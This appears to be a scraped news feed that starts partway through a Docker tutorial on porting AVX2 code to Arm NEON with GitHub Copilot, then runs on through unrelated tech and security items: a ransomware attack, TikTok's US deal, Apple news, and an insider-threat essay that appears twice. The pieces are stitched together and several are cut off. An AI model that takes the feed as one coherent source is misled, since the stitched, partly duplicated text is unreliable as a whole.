- Include performance predictions and cost savings in the PR description
- List all tools used and validation steps needed

Step 2. Watch Docker MCP Toolkit Execute
GitHub Copilot orchestrates the migration using Docker MCP Toolkit. Here’s what happens:
Phase 1: Image Analysis
GitHub Copilot starts by analyzing the Dockerfile’s base image using the Arm MCP Server’s skopeo tool.
Caption: GitHub Copilot uses the skopeo tool from the Arm MCP Server to analyze the centos:6 base image. The tool reports that this image has no arm64 build available. This is the first blocker identified – the container won’t even start on Arm hardware.
This immediately identifies that CentOS 6 has no ARM64 builds and must be replaced.
Phase 2: Code Analysis
Next, Copilot runs the migrate_ease_scan tool with the C++ scanner on the codebase.
Caption: The migrate_ease_scan tool analyzes the C++ source code and detects AVX2 intrinsics, the -mavx2 compiler flag, and x86-specific headers. This automated scan identifies all architecture-dependent code that requires conversion – work that could take hours to find manually.
The scan results show exactly what needs to change for Arm compatibility. Each detected issue includes the file location, line number, and specific code that requires modification. This precision eliminates guesswork and ensures nothing is missed.
Phase 3: Arm Optimization and Best Practices
For the x86 intrinsics found in Phase 2, Copilot queries the Arm MCP Server’s knowledge base for Arm equivalents where needed, then makes the replacements.
Caption: GitHub Copilot uses the knowledge_base_search tool to find Arm NEON equivalents for each AVX2 intrinsic.
The tool returns official Arm documentation showing the conversions: _mm256_loadu_pd() becomes vld1q_f64(), _mm256_add_pd() becomes vaddq_f64(), and so on. This knowledge comes from learn.arm.com learning paths and intrinsic documentation.
The knowledge base provides not just the conversion mappings, but also architectural context: AVX2’s 256-bit vectors vs NEON’s 128-bit vectors, which means loop adjustments are needed. Copilot uses this information to rewrite the matrix multiplication code correctly.
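What the rewritten kernel ends up looking like, as an added example written for this post (it is neither the repository’s code nor the output Copilot produced, and the names dot_strided, dot_strided_scalar, matmul, max_abs_error and simd_path are my own): the strided dot product at the heart of the multiply from the issue list above, with the NEON path (two doubles per register, constant lane indices, vaddvq_f64 for the horizontal add) next to the original AVX2 path under architecture guards, a scalar fallback, and a check against a scalar reference, which matters because fused multiply-add changes the rounding.

```cpp
#include <cmath>
#include <cstddef>
#include <vector>

#if defined(__aarch64__) || defined(_M_ARM64)
#include <arm_neon.h>      // Arm: 128-bit NEON registers, 2 doubles each
#elif defined(__AVX2__)
#include <immintrin.h>     // x86: 256-bit AVX2 registers, 4 doubles each
#endif

// Reports which path this translation unit was compiled with (hypothetical helper).
const char* simd_path() {
#if defined(__aarch64__) || defined(_M_ARM64)
    return "NEON";
#elif defined(__AVX2__)
    return "AVX2";
#else
    return "scalar";
#endif
}

// Plain scalar reference: dot product of contiguous a[0..n) with the
// strided column b[0], b[stride], b[2*stride], ... of a row-major matrix.
double dot_strided_scalar(const double* a, const double* b,
                          std::size_t n, std::size_t stride) {
    double sum = 0.0;
    for (std::size_t k = 0; k < n; k++) sum += a[k] * b[k * stride];
    return sum;
}

// Same dot product with an architecture-guarded SIMD body.
double dot_strided(const double* a, const double* b,
                   std::size_t n, std::size_t stride) {
    std::size_t k = 0;
    double sum = 0.0;
#if defined(__aarch64__) || defined(_M_ARM64)
    // NEON holds 2 doubles per register, so the loop stride drops from 4 to 2.
    float64x2_t acc = vdupq_n_f64(0.0);                  // was _mm256_setzero_pd
    for (; k + 1 < n; k += 2) {
        float64x2_t a_vec = vld1q_f64(a + k);            // was _mm256_loadu_pd
        // No NEON equivalent of _mm256_set_pd: gather the two strided
        // elements lane by lane. Lane indices must be compile-time constants.
        float64x2_t b_vec = vdupq_n_f64(b[k * stride]);
        b_vec = vsetq_lane_f64(b[(k + 1) * stride], b_vec, 1);
        acc = vfmaq_f64(acc, a_vec, b_vec);              // acc += a_vec * b_vec (fused)
    }
    sum = vaddvq_f64(acc);   // horizontal add: replaces the extractf128/cast sequence
#elif defined(__AVX2__)
    __m256d acc = _mm256_setzero_pd();
    for (; k + 3 < n; k += 4) {
        __m256d a_vec = _mm256_loadu_pd(a + k);
        __m256d b_vec = _mm256_set_pd(b[(k + 3) * stride], b[(k + 2) * stride],
                                      b[(k + 1) * stride], b[k * stride]);
        acc = _mm256_add_pd(acc, _mm256_mul_pd(a_vec, b_vec));
    }
    __m128d lo = _mm256_castpd256_pd128(acc);
    __m128d hi = _mm256_extractf128_pd(acc, 1);
    double tmp[2];
    _mm_storeu_pd(tmp, _mm_add_pd(lo, hi));
    sum = tmp[0] + tmp[1];
#endif
    // Remainder after the SIMD loop, or the whole product in a scalar build.
    for (; k < n; k++) sum += a[k] * b[k * stride];
    return sum;
}

// Row-major (m x kdim) * (kdim x n) -> (m x n), one strided dot per output cell.
std::vector<double> matmul(const std::vector<double>& a, const std::vector<double>& b,
                           std::size_t m, std::size_t kdim, std::size_t n) {
    std::vector<double> c(m * n, 0.0);
    for (std::size_t i = 0; i < m; i++)
        for (std::size_t j = 0; j < n; j++)
            c[i * n + j] = dot_strided(&a[i * kdim], &b[j], kdim, n);
    return c;
}

// Largest |SIMD - scalar| over a whole product. FMA on NEON rounds once per
// multiply-add instead of twice, so expect tiny, not zero, differences.
double max_abs_error(const std::vector<double>& a, const std::vector<double>& b,
                     std::size_t m, std::size_t kdim, std::size_t n) {
    std::vector<double> c = matmul(a, b, m, kdim, n);
    double worst = 0.0;
    for (std::size_t i = 0; i < m; i++)
        for (std::size_t j = 0; j < n; j++) {
            double ref = dot_strided_scalar(&a[i * kdim], &b[j], kdim, n);
            worst = std::fmax(worst, std::fabs(c[i * n + j] - ref));
        }
    return worst;
}
```

Compile the same file with -march=armv8-a+simd on Arm and with -mavx2 on x86 to exercise each path; the validation loop is the numerical-accuracy test that a manual conversion would otherwise skip.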
Phase 4: Create the GitHub PR and Summarize
After completing the migration, Copilot creates a PR in GitHub and summarizes the changes made.
The changes are substantial: 
Replaced centos:6 → ubuntu:22.04, added TARGETARCH for multi-arch builds
Added ARM64 detection and -march=armv8-a+simd compiler flag
Converted AVX2 → NEON intrinsics with architecture guards

The build is now simpler, modern, and Arm-compatible.
Phase 5: Checking the Pull Request
You can verify the Pull Request by visiting https://github.com/JoeStech/docker-blog-arm-migration/pull/1/

To verify performance, you can build and run the benchmark:
docker buildx build --platform linux/arm64 -t benchmark:arm64 . --load
docker run --rm benchmark:arm64

Which should output:

SIMD Matrix Operations Benchmark
================================
Running on ARM64 architecture with NEON optimizations

=== Matrix Multiplication Benchmark ===
Matrix size: 200x200
Time: 17 ms
Result sum: 1.98888e+08

Caveats
A very important thing to remember is that not all models will provide equal results, and while the Arm MCP Server provides deterministic context, the models themselves are stochastic. Always use a flagship latest-generation model to get the best results, and test any guesses the model makes regarding performance improvement.
How Docker MCP Toolkit Changes Development
Docker MCP Toolkit changes how developers interact with specialized knowledge and capabilities. Rather than learning new tools, installing dependencies, or managing credentials, developers connect their AI assistant once and immediately access containerized expertise.
The benefits extend beyond Arm migration:
Consistency – Same tools, same results across all developers
Security – Containerized isolation prevents tool interference
Version Control – MCP server versions tracked with application code
Reproducibility – Migrations behave identically across environments
Discoverability – Docker MCP Catalog makes finding the right server straightforward

Most importantly, developers remain in their existing workflow. VS Code. GitHub Copilot. Git. No context switching to external tools or dashboards.
Wrapping Up
You’ve just automated ARM64 migration using Docker MCP Toolkit, the Arm MCP Server, and GitHub Copilot. What used to require architecture expertise, manual intrinsic conversion, and hours of debugging now happens through natural conversation, safely executed in Docker containers.
Ready to try it? Open Docker Desktop and explore the MCP Catalog. Start with the Arm MCP Server, add GitHub, experiment with Sequential Thinking. Each server unlocks new capabilities.
The future of migration isn’t manually porting every application. It’s having an AI assistant that can execute tasks across your entire stack securely, reproducibly, and at the speed of thought.
Learn More
New to Docker? Download Docker Desktop
Explore the MCP Catalog: Discover containerized, security-hardened MCP servers
Get Started with MCP Toolkit: Official Documentation
VGMT
The administrative office and the mobility centre of the Verkehrsgesellschaft Main-Tauber (VGMT) are currently closed and cannot be reached by telephone or e-mail. As the organisation recently announced, a cyberattack is behind this. According to the statement, the attackers encrypted the company’s servers and data.
Whether data was stolen is so far unclear. According to the statement, the investigation into the case has not yet been completed. No further details about the attack are currently available.
“The transport company and the district administration (Landratsamt) are working flat out to resolve the problems,” VGMT managing director Thorsten Haas assures. The aim is to restore at least a limited service of the mobility centre and the VGMT office as quickly as possible.
Public transport not affected
After that, the VGMT intends to return step by step to regular operations under further heightened security precautions. How long this will take cannot yet be foreseen, according to the VGMT. Public transport (ÖPNV), however, is not affected by the incident.
To investigate the case, the Cybersecurity Agency of the State of Baden-Württemberg (Cybersicherheitsagentur Baden-Württemberg) and the police have been brought in. In addition, the IT specialists of the district administration and of a service provider are examining the case.
“For legal reasons, the VGMT operates its own IT network, which is completely separate from that of the district administration,” the transport company explains. As a result, the administration was spared from the attack.
TikTok has announced that it has finalized a deal to establish a majority American-owned joint venture, allowing the app to continue operating in the United States indefinitely.


First agreed in December, the deal creates "TikTok USDS Joint Venture LLC," which will be 80.1 percent owned by U.S. and global investors, with ByteDance retaining a 19.9 percent stake. Oracle, Silver Lake, and Abu Dhabi-based MGX each hold 15 percent as managing investors. Additional stakeholders include the Dell Family Office and affiliates of Susquehanna International Group.

A White House official confirmed that both the U.S. and Chinese governments have signed off on the arrangement.

President Trump praised the outcome in a social media post, writing that he was "so happy to have helped in saving TikTok," and thanked Chinese President Xi Jinping "for working with us and, ultimately, approving the Deal."

The new venture will operate under a seven-member, majority-American board of directors. Adam Presser, formerly TikTok's general manager and global head of operations, has been appointed CEO of the joint venture. TikTok's global chief executive Shou Zi Chew will also serve on the board.

Under the agreement, the venture will handle U.S. data protection, content moderation, and algorithm security. TikTok's recommendation algorithm – widely considered key to the app's popularity – will be retrained exclusively on U.S. user data and secured within Oracle's cloud infrastructure. Oracle will also serve as a "Trusted Security Partner" to review and validate TikTok's source code.

The deal ends years of regulatory uncertainty that began in August 2020, when Trump first tried to ban the app during his first term. Congress passed legislation in 2024 requiring ByteDance to divest TikTok's U.S. operations or face a nationwide ban. The law was upheld by the Supreme Court in January 2025. Trump has extended the deadline multiple times since then to let the negotiations play out.

TikTok has more than 200 million users in the United States. It's unclear exactly how the restructured algorithm will affect the user experience, but the app could end up working differently compared to TikTok in other countries.
This article, "TikTok Avoids US Ban as Joint Venture Deal Officially Closes" first appeared on MacRumors.com
Fortinet has officially confirmed that it's working to completely plug a FortiCloud SSO authentication bypass vulnerability following reports of fresh exploitation activity on fully-patched firewalls. "In the last 24 hours, we have identified a number of cases where the exploit was to a device that had been fully upgraded to the latest release at the time of the attack, which suggested a new
Did you know it's possible to take multiple Live Photos from your iPhone's photo library and turn them into a single continuous video? Keep reading to learn how it's done.


On iPhone and iPad, Live Photos bring your pictures to life by adding a few seconds of video before and after the shot, creating a living memory rather than a static image.

While Live Photos are great on their own, it's also possible to weave several together to create a video montage. This process transforms a collection of moments into a cohesive narrative, and offers an easier way to share and relive your memories.

Whether it's a series of shots from a special event, a day out with friends, or a compilation of everyday moments, the following steps show you how to turn several Live Photos into a video that can encapsulate their essence in a way that a single photo or traditional video might not.

In the Photos app, tap the Collections icon at the bottom of the screen.
Scroll down to "Media Types," and tap Live Photos.
Tap Select in the top-right corner, then tap the Live Photos you want to include in your video so that a little checkmark appears on each one.

Tap the button with three dots in the top-right corner.
Choose Save as Video in the pop-up menu.

That's all there is to it. To watch your newly created video, return to the Library view or find it in the Videos category under Media Types.

Note that the video will be dated to when the Live Photos were originally taken, so unless you have the Sort by Recently Added option checked, they may not show as the latest video in your collection.
This article, "Turn Several Live Photos into a Single Video on iPhone" first appeared on MacRumors.com
Andrii Yalanskyi – shutterstock.com
What if your organisation’s greatest security risk already holds an employee badge, is legitimately logged in and knows exactly how internal processes work? The question is uncomfortable, but it marks the starting point for a long-overdue reckoning with insider threats.

Insider threats: the blind spot

Whether at industry conferences or in internal company meetings: when security risks are discussed, the gaze almost always turns reflexively outward. To hacker groups and cybercriminals, to foreign intelligence services, to followers of political or religious groups and to business competitors. An organisation’s own employees barely feature as a category of perpetrator. In many organisations insiders are still a taboo subject, regarded at most as a fringe phenomenon and a few “black sheep”. This assumption is convenient, and at the same time highly dangerous, because it obscures a risk that is structural, multi-layered and highly effective.
Empirical data show that insider threats are a systematic security risk. In a 2025 Bitkom survey, 48 percent of German companies reported that cases of data theft, industrial espionage or sabotage were attributable to their own employees. At 25 percent of companies these were (former) employees acting unintentionally, at 23 percent (former) employees acting deliberately. After attacks by organised criminals and gangs (68 percent), insider offences are thus the second most frequent category. Other statistics show that 61 percent of organisations worldwide have already identified an insider incident, and for 29 percent this led to a security incident.
These figures make one thing clear: a security strategy that focuses exclusively on external threats is dangerously incomplete. Insider risks are a relevant part of the threat landscape and must be systematically included in risk analyses.
Insider risks are underestimated
Social organisation is a fundamental feature of human evolution. Since time immemorial, humans have banded together in groups to hunt, share knowledge and defend themselves against threats. Being part of a group meant protection from external dangers and could secure survival. The basis for all of this was mutual trust within the group.
Today, too, trust forms the foundation for a functioning organisation. It is the starting point for constructive, efficient and successful collaboration. To do their jobs, employees need access to company premises, to databases and ordering systems, and to information about products, processes, suppliers, service providers and customers. Employers equip staff with the necessary permissions and in return rely on the loyalty and integrity of their employees. That someone on the inside might consciously and deliberately turn against their own organisation is, for many people, simply unimaginable and morally reprehensible. The result: the danger is blanked out. Blind trust, however, makes organisations vulnerable.
Insider threats are dangerous
Insiders hold legitimate permissions and have deep knowledge of infrastructure, systems, processes and stakeholders. At the same time they have a very precise view of an organisation’s weaknesses. They know the critical assets, where sensitive data resides and which processes are particularly vulnerable. Insiders also know which control mechanisms exist and which do not. They are likewise familiar with how security gaps can be exploited and controls circumvented. That is a structural advantage of every insider.
Yet only the misuse of permissions turns an insider into an internal perpetrator. Detecting this is difficult, however, because their actions appear inconspicuous and legitimate. Access occurs with valid permissions, processes are formally followed, anomalies are subtle. Classic security mechanisms often do not trigger here.
Insider perpetrators can thus often operate for an extended period without being detected. Typical deliberate forms of attack from within are fraud, theft of information and physical goods, espionage, sabotage and violence. The triggers for these acts are varied and range from emotional and situational stress, dissatisfaction and frustration, opportunism and financial interests to conflicts of loyalty. Alongside such disloyal insiders, there are also professionally planted insiders who act, for example, on behalf of a foreign intelligence service.
In contrast to these two groups of perpetrators there is a third group of people: employees who, for example, click a link in a phishing e-mail in the rush of everyday work, carelessly send an e-mail to the wrong recipient, or use AI tools not approved by the company to save working time. Whether this last group, which acts without malicious intent or criminal energy, can and should be called insider perpetrators and treated as such is something each organisation must define for itself.
The extent of damage from attacks from within can be massive. Damage caused by insiders often has a more lasting effect than external attacks, financially, reputationally and organisationally. Depending on the severity of the attack, organisational trauma can also result, for example after a rampage.
Classic security measures are not enough
Technical systems make an important contribution to detecting insider risks, but they run into clear limits. Tools such as Identity and Access Management (IAM), Data Loss Prevention (DLP) or User and Entity Behaviour Analytics (UEBA) can identify anomalies and deviations, but not the underlying emotions, motives or intentions. Technology can thus provide indicators and make symptoms visible, yet a considerable share of insider threats remains invisible to technical systems. Think of the theft of paper files, the installation of mini cameras to watch computer screens, or the sabotage of physical infrastructure. Insider threats are complex and by no means a pure IT topic. Other departments such as corporate security, HR, compliance, legal, internal communications and management are relevant stakeholders too.
A further central problem is the lack of clear risk ownership for insider threats. While protection against external attacks is firmly anchored in many organisations, often with dedicated departments, clearly defined responsibilities and established processes, a comparable counterpart for threats from within is frequently missing entirely. Without unambiguous responsibility, insider risks can be neither systematically assessed nor preventively managed.
The consequence of fixation on technology, silo thinking and missing ownership: isolated individual measures such as stricter access rights, additional controls and new tools. These measures are not wrong, but they form only an isolated fragment of systematic risk management.
What a modern approach to insider threats means
The uncertainty in dealing with insider threats also shows in surveys: while concern about malicious insiders among cybersecurity experts has risen markedly, from 60 percent in 2019 to 74 percent in 2024, only 29 percent of respondents feel they have the right tools to protect their organisation. What is often lacking is an overarching perspective: which risks are truly critical for us? How does the topic fit into existing risk, governance and process structures? Who bears responsibility?
A contemporary approach to insider threats does not begin with distrust but with risk awareness. It is not about placing employees under general suspicion, but about understanding risks systematically and managing them responsibly.
The change of perspective is central: from reaction to prevention, from individual cases to structures, from technology to organisation. A modern approach combines culture, structure and responsibility. It strengthens trust and compliance by establishing clear rules and processes. It also enables lasting resilience instead of merely reacting to incidents. The appeal is unambiguous: looking away increases the risk. Looking closely creates the capacity to act.
Conclusion: why action is needed now
Insider threat management is neither a product nor a control regime. It is a human-centred management approach that protects trust by making risks transparent and addressing them consciously. With the European NIS2 and CER directives, risk management is moving more strongly into focus. Security is still frequently understood as a kind of outer defence. What is often overlooked: a considerable share of risks arises inside organisations.
Insider threat management is therefore no longer an optional add-on but part of responsible corporate governance. The decisive question is not whether insider risks exist, but whether organisations are prepared to manage them consciously. (jm)
View the full article
Andrii Yalanskyi – shutterstock.com
Was wäre, wenn das größte Sicherheitsrisiko Ihrer Organisation bereits einen Mitarbeitendenausweis besitzt, legitim angemeldet ist und genau weiß, wie interne Prozesse funktionieren? Diese Frage ist unbequem, aber sie markiert den Ausgangspunkt für eine längst überfällige Auseinandersetzung mit Insider-Bedrohungen.

Insider Threats – der blinde Fleck

Whether at industry conferences or in internal company meetings: when security risks are discussed, attention almost always turns reflexively outward. To hacker groups and cybercriminals, foreign intelligence services, followers of political or religious groups, and commercial competitors. An organization's own employees barely feature as a group of perpetrators. In many organizations, insiders are still a taboo subject, regarded at best as a fringe phenomenon and a few "black sheep". This assumption is convenient, and at the same time highly dangerous, because it obscures a risk that is structural, multifaceted and highly effective.
Empirical data shows that insider threats are a systematic security risk. In a 2025 Bitkom survey, 48 percent of German companies reported cases of data theft, industrial espionage or sabotage attributable to their own employees. At 25 percent of companies the culprits were (former) employees acting unintentionally, at 23 percent (former) employees acting deliberately. After attacks by organized criminals and gangs (68 percent), insider offenses are thus the second most common type of incident. Other statistics show that 61 percent of organizations worldwide have already identified an insider incident, and that for 29 percent this led to a security incident.
These figures make one thing clear: a security strategy focused exclusively on external threats has dangerous gaps. Insider risks are a relevant part of the threat landscape and must be systematically included in risk analyses.
Insider risks are underestimated
Social organization is a fundamental feature of human evolution. Since time immemorial, people have banded together in groups to hunt, share knowledge and defend against threats. Being part of a group meant protection from external dangers and could secure survival. The basis for all of this was mutual trust within the group.
Today, too, trust is the foundation on which an organization functions. It is the starting point for constructive, efficient and successful collaboration. To do their jobs, employees need access to company premises, to databases and ordering systems, and to information about products, processes, suppliers, service providers and customers. Employers grant staff the necessary permissions and in return rely on their employees' loyalty and integrity. That someone on the inside might deliberately and intentionally turn against their own organization is inconceivable to many people and simply morally reprehensible. The consequence: the danger is blanked out. Blind trust, however, makes organizations vulnerable.
Insider threats are dangerous
Insiders hold legitimate permissions and have deep knowledge of infrastructure, systems, processes and stakeholders. At the same time they have a very precise view of an organization's weaknesses. They know the critical assets, where sensitive data resides and which processes are particularly vulnerable. Insiders also know which control mechanisms exist and which do not, and they know how security gaps can be exploited and controls bypassed. That is a structural advantage shared by all insiders.
Yet only the misuse of permissions turns an insider into an insider perpetrator. Detecting this is difficult, however, because their actions appear inconspicuous and legitimate. Access takes place with valid permissions, processes are formally followed, anomalies are subtle. Classic security mechanisms often do not trigger here.
As a result, insider perpetrators can often operate for an extended period without being discovered. Typical deliberate forms of attack from within are fraud, theft of information and physical goods, espionage, sabotage and violence. The triggers for these acts are varied and range from emotional and situational strain, dissatisfaction and frustration, opportunism and financial interests to conflicts of loyalty. Alongside such disloyal insiders there are also professionally placed insider perpetrators, acting for example on behalf of a foreign intelligence service.
In contrast to these two groups of perpetrators there is a third group of people: employees who, for example, click a link in a phishing e-mail in the rush of daily work, carelessly send an e-mail to the wrong recipient, or use AI tools not approved by the company to save working time. Whether this last group, which acts without malicious intent or criminal energy, can and should be called and treated as insider perpetrators is something every organization must define for itself.
The scale of damage from insider attacks can be massive. Damage caused by insider perpetrators often has a more lasting effect than external attacks, financially, reputationally and organizationally. Depending on the severity of the attack, organizational trauma can also result, for example after a rampage.
Classic security measures are not enough
Technical systems make an important contribution to detecting insider risks but run into clear limits. Tools such as Identity and Access Management (IAM), Data Loss Prevention (DLP) or User and Entity Behaviour Analytics (UEBA) can identify anomalies and deviations, but not the emotions, motives or intentions behind them. Technology can thus provide indications and make symptoms visible, yet a substantial share of insider threats remains invisible to technical systems. Think of the theft of paper files, the installation of miniature cameras to monitor computer screens, or the sabotage of physical infrastructure. Insider threats are complex and by no means a purely IT topic. Other departments such as corporate security, HR, compliance, legal, internal communications and management are relevant stakeholders too.
Another central problem is the lack of clear risk ownership for insider threats. While protection against external attacks is firmly anchored in many organizations, often with dedicated departments, clearly defined responsibilities and established processes, a comparable counterpart for threats from within is frequently missing entirely. Without unambiguous responsibility, insider risks can be neither systematically assessed nor proactively managed.
The consequence of fixation on technology, silo thinking and missing ownership: isolated individual measures such as stricter access rights, additional controls and new tools. These measures are not wrong, but they form only an isolated fragment of systematic risk management.
What a modern approach to insider threats means
Uncertainty in dealing with insider threats also shows up in surveys: while concern about malicious insiders among cybersecurity professionals has risen markedly, from 60 percent in 2019 to 74 percent in 2024, only 29 percent of respondents feel they have the right tools to protect their organization. What is often missing is an overarching perspective: which risks are truly critical for us? How does the topic fit into existing risk, governance and process structures? Who bears responsibility?
A contemporary approach to insider threats begins not with suspicion but with risk awareness. It is not about placing employees under general suspicion, but about understanding risks systematically and managing them responsibly.
Central is the shift in perspective: from reaction to prevention, from individual cases to structures, from technology to organization. A modern approach combines culture, structure and responsibility. It strengthens trust and compliance by establishing clear rules and processes. It also enables lasting resilience instead of merely reacting to incidents. The appeal is unambiguous: looking away increases the risk. Looking closely creates the ability to act.
Conclusion: why action is needed now
Insider threat management is neither a product nor a control regime. It is a people-centered management approach that protects trust by making risks transparent and addressing them deliberately. With the European NIS2 and CER directives, risk management is moving more strongly into focus. Security is still frequently understood as a kind of perimeter defense. What is often overlooked: a substantial share of the risks arises inside organizations.
Insider threat management is therefore no longer an optional add-on but part of responsible corporate governance. The decisive question is not whether insider risks exist, but whether organizations are prepared to manage them consciously. (jm)
View the full article
TikTok on Friday officially announced that it formed a joint venture that will allow the hugely popular video-sharing application to continue operating in the U.S. The new venture, named TikTok USDS Joint Venture LLC, has been established in compliance with the Executive Order signed by U.S. President Donald Trump in September 2025, the platform said. The new deal will see TikTok's Chinese
View the full article
Cybersecurity researchers have disclosed details of a new dual-vector campaign that leverages stolen credentials to deploy legitimate Remote Monitoring and Management (RMM) software for persistent remote access to compromised hosts. "Instead of deploying custom viruses, attackers are bypassing security perimeters by weaponizing the necessary IT tools that administrators trust," KnowBe4 Threat
View the full article
Apple has accused the European Commission of using "political delay tactics" to manufacture a reason to investigate and fine the company, according to Bloomberg.


The statement appears designed to get ahead of reports that the EC is preparing to cite Apple as the reason behind the imminent closure of Setapp Mobile, the third-party iOS app marketplace that announced its shutdown earlier this month.

MacPaw, the developer behind Setapp Mobile, said the service would close on February 16 due to "still-evolving and complex business terms" for alternative app stores in the EU.

Responding to the closure, the EC is preparing to say that Apple "has not rolled out changes to address the key issues concerning its business terms, including their complexity," according to remarks seen by Bloomberg.

However, Apple says the commission itself is blocking those changes.

"The European Commission has refused to let us implement the very changes that they requested," Apple said in a statement given to the publication. "In October, we submitted a formal compliance plan and they have yet to respond."

Apple was required to allow third-party app marketplaces on iOS in the EU under the Digital Markets Act, which took effect more than two years ago. The company charges fees on those marketplaces, including a Core Technology Fee of €0.50 per install over one million. As a result of discussions with the EC last year, Apple said it planned to change its fee structure to a 5% revenue share to make it more economical for developers. Apple claims that change hasn't been implemented because the EC hasn't approved its compliance plan.

Apple also disputed that Setapp is shutting down because of its policies, and claimed there is "no demand" for alternative App Stores in the EU. There are five other alternative marketplaces currently available, with the most prominent being the Epic Games Store.
This article, "Apple Rejects Blame for Setapp Mobile App Marketplace Closure, Accuses EU of 'Political Delay Tactics'" first appeared on MacRumors.com


View the full article
Apple has sent out invites to select creators for an "Apple Experience" in Los Angeles, California, scheduled for January 27 to 29. The event has sparked speculation that Apple will also announce new MacBook Pro models with M5 Pro and M5 Max chips.


Creator Petr Mara shared an image of his invite on Instagram. Mara was also invited to an Apple event in September to test out the latest iPhone 17 Pro models.

Apple's new Creator Studio bundle of creative apps, announced last week, launches on Wednesday, January 28. Given the bundle includes several professional Mac apps, such as Final Cut Pro, Logic Pro, and Pixelmator Pro, there's a good chance that Apple will use the coinciding event as an opportunity to release new MacBook Pro models too.

Also, Apple's next quarterly earnings call is scheduled for Thursday, January 29, and the company has introduced new products shortly before these calls on several occasions.

Apple in October updated the base 14-inch MacBook Pro with an M5 chip, so the higher-end models are due an upgrade. Beyond the processor, the only other notable change to the base model was PCIe 5.0 storage. According to Apple, this delivers up to twice the SSD read and write speeds of the previous generation.
This article, "Apple Invites Creators to LA Event on January 27-29 That Could Coincide With MacBook Pro Announcement" first appeared on MacRumors.com


View the full article
Microsoft has warned of a multi‑stage adversary‑in‑the‑middle (AitM) phishing and business email compromise (BEC) campaign targeting multiple organizations in the energy sector. "The campaign abused SharePoint file‑sharing services to deliver phishing payloads and relied on inbox rule creation to maintain persistence and evade user awareness," the Microsoft Defender Security Research Team said.
View the full article
For now, rumors have settled on the iPhone 18 Pro and iPhone 18 Pro Max featuring a smaller Dynamic Island, and now a leaker has revealed its alleged size.

iPhone 18 Pro with a smaller Dynamic Island (mockup via Ice Universe)
The account "Ice Universe" today claimed the Dynamic Island cutout on the iPhone 18 Pro models will be approximately 35% narrower than it is on the iPhone 17 Pro models. Specifically, they said it will have a width of around 13.5mm, down from around 20.7mm, and they shared the mockup image above to show what it would look like.

An earlier report from The Information indicated that the iPhone 18 Pro models will feature under-screen Face ID. As a result, the publication said the devices would have only a hole-punch front camera in the top-left corner of the screen, rather than the current pill-shaped cutout for the front camera and Face ID sensors. However, the latest word is that only Face ID's flood illuminator will be moved under the screen this year, meaning that Apple will only be able to shrink the pill-shaped cutout rather than remove it entirely.

According to display industry expert Ross Young, who has a very good track record, the smaller Dynamic Island will last through at least 2027. So, it could take at least a few more years until the iPhone finally gets a truly seamless display.

"Ice Universe" has leaked some accurate iPhone dimensions in the past, giving them credibility, but they do not have a perfect track record.

Apple is expected to unveil the iPhone 18 Pro models in September.
This article, "iPhone 18 Pro: Leaker Reveals Alleged Size of Smaller Dynamic Island" first appeared on MacRumors.com


View the full article
Read what matters in the collaboration between your IT security and engineering teams.
Foto: Lipik Stock Media – shutterstock.com
Security teams consist primarily of staff responsible for operations and for compliance with regulations and policies. IT security engineering teams, by contrast, are builders. They develop services, automate processes and optimize deployments to support the central IT security team and its stakeholders. A security engineering team typically consists of software and infrastructure engineers, architects and product managers.
Technical skills in security engineering
Security engineering is essentially a technical discipline, so one of the fundamental elements of the role is naturally rooted in technology. These are the essential skills that CISOs should impart and develop in their security engineering teams:
Understanding the technical environment
That it is crucial to understand and work within the technical environment seems self-evident. Yet if a company deploys services in Kubernetes, for example, and the engineering team has never worked with containers, that is a problem. A high level of technical understanding of the entire IT environment has a positive effect on the security team.
A counterpoint to this is fostering a team that is diverse in skills, problem-solving perspectives and levels of experience across the various areas of a company. There are of course many ways to pursue and foster this diversity in a team, from gender and ethnic background to educational background, previous professional experience and age. Diversity can greatly increase a team's creative energy when ideas are challenged, debated and iterated.
However, leaders should handle the diversity of perspectives and experience carefully. An excessive degree of variation and friction in the thinking and collaboration process can produce the opposite of the desired effect. Analysis paralysis is common, with teams stuck in a state of thinking about doing rather than doing. A similar condition that can arise from overly heterogeneous teams is a complex set of interdependent deliverables with interlinked failure conditions.
Mastering the full stack
IT security engineering teams should be able to build and operate the services they develop. This level of ownership within a group is crucial both from a technical-competence standpoint and from a cultural standpoint, as it sets the tone for accountability. Technically, a team capable of managing its own services will competently manage the infrastructure, the CI/CD tooling, the security tooling, the application code, the deployments and the operational telemetry a service emits. Moreover, the skills behind a team supporting itself are highly transferable to supporting other groups in the company.
Embracing the developer experience (DevX)
Security teams that understand, embrace and optimize the developer experience (DevX) are likely to collaborate better. Moreover, a particular focus will be on removing friction. Friction makes things take longer and cost more, lengthens learning cycles and causes frustration. Less friction means things generally run much better.
Sometimes, though, friction is necessary and should be intentional. One example is a mandatory code review of critical code before it is merged. If this interruption, review and merge rests on a conscious decision, it is justified, deliberate friction. If the IT security team seeks friction in developers' release process, it should be based on specific requirements, for example a compliance control that mandates manual review as part of change management. These controls should not be deployed thoughtlessly. The friction imposed on developers is a cost that could outweigh any undefined risk the IT security team has in mind.
IT security teams that treat the developer experience as a top priority must understand the tools and workflows required to write quality software at various levels of the stack. Adopting this developer-first mindset may require skills in infrastructure or platform engineering. On the other hand, the output of a security engineering team can affect others who are likewise busy automating workflows, connecting services to one another and, in essence, jointly instrumenting an ever-growing environment. All of this work helps developers work faster and with less friction. The result is more flexibility and faster deployment. Regardless, this is a trait and a guiding principle from which a security engineering team benefits in its productivity, and which promotes and cultivates empathy for those it serves.
Leadership and collaboration skills in security engineering
Security engineering teams do not work in a vacuum, whatever their size and project load. Working alongside and in the service of others is an essential part of the mission. It is a necessary part of the whole and helps others achieve successful outcomes.
Communicating and collaborating
Members of the security engineering team should be able to communicate with one another and with stakeholders outside the group. They should also be able to collaborate well to achieve shared goals. This means understanding the problems, friction points, constraints and opportunities of security-focused development. Ultimately, doing the right things matters more than simply working efficiently.
All of these questions must be explored through deliberate communication and collaboration. This can manifest in human-centered design principles, matrix-based resourcing or an alignment based on team topologies. Of course there is no silver bullet for communication and collaboration within and between teams. Whatever the approach, building trust, empathy, interest in shared goals and the willingness to set aside one's own pride for the sake of the mission are the foundation.
Leading and influencing others
Seth Godin, bestselling author and marketing expert, holds that anyone can be a leader; it is a choice, not a title. It comes down to the convergence of ideas, a gap in direction and someone motivated enough to step in.
The success of security engineering teams, as in other areas of cybersecurity, depends on others. It is, however, independent of the team's performance, however optimal that may be. Put differently: you cannot simply build something and walk away. You have to listen to others, involve them, persuade them to adopt, and much more.
